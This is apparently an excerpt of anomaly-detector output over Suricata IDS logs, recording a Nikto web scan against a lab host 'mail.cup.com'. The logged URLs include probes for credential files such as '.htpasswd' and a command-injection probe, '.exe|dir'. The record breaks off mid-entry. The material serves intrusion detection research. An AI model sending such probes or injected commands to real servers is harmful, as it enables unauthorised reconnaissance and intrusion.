"\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htpasswd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.htpasswd\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.htpasswd\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.htpasswd", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.htpasswd", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46914,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46914, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":220086993078258,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 220086993078258, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.314940+0000\",\"flow_id\":220086993078258,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46914,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htpasswd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htpasswd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.316707 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46916 -> 192.168.10.154:80", "/parser/model/time": 1583349514.316707, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46916, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.316707 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46916 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.32 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.signature", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.316954+0000\",\"flow_id\":1437349444244092,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46916,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.signature\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.signature\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.316954, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1437349444244092,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46916,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.signature\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.signature\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46916,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.signature\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.signature\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.signature\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.signature\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.signature", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.signature", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46916,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46916, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1437349444244092,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1437349444244092, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.316954+0000\",\"flow_id\":1437349444244092,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46916,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.signature\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.signature\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.32 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.318931 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46918 -> 192.168.10.154:80", "/parser/model/time": 1583349514.318931, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46918, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.318931 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46918 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.32 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.html~", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.319109+0000\",\"flow_id\":2026627547191976,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46918,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.html~\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.html~\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.319109, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2026627547191976,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46918,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.html~\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.html~\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46918,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.html~\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.html~\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.html~\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.html~\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.html~", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.html~", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46918,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46918, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2026627547191976,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2026627547191976, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.319109+0000\",\"flow_id\":2026627547191976,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46918,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.html~\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.html~\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.32 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.321065 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46920 -> 192.168.10.154:80", "/parser/model/time": 1583349514.321065, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46920, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.321065 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46920 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.32 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.exe|dir", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.321278+0000\",\"flow_id\":1783528103273160,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46920,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.exe|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.exe|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.321278, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1783528103273160,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": 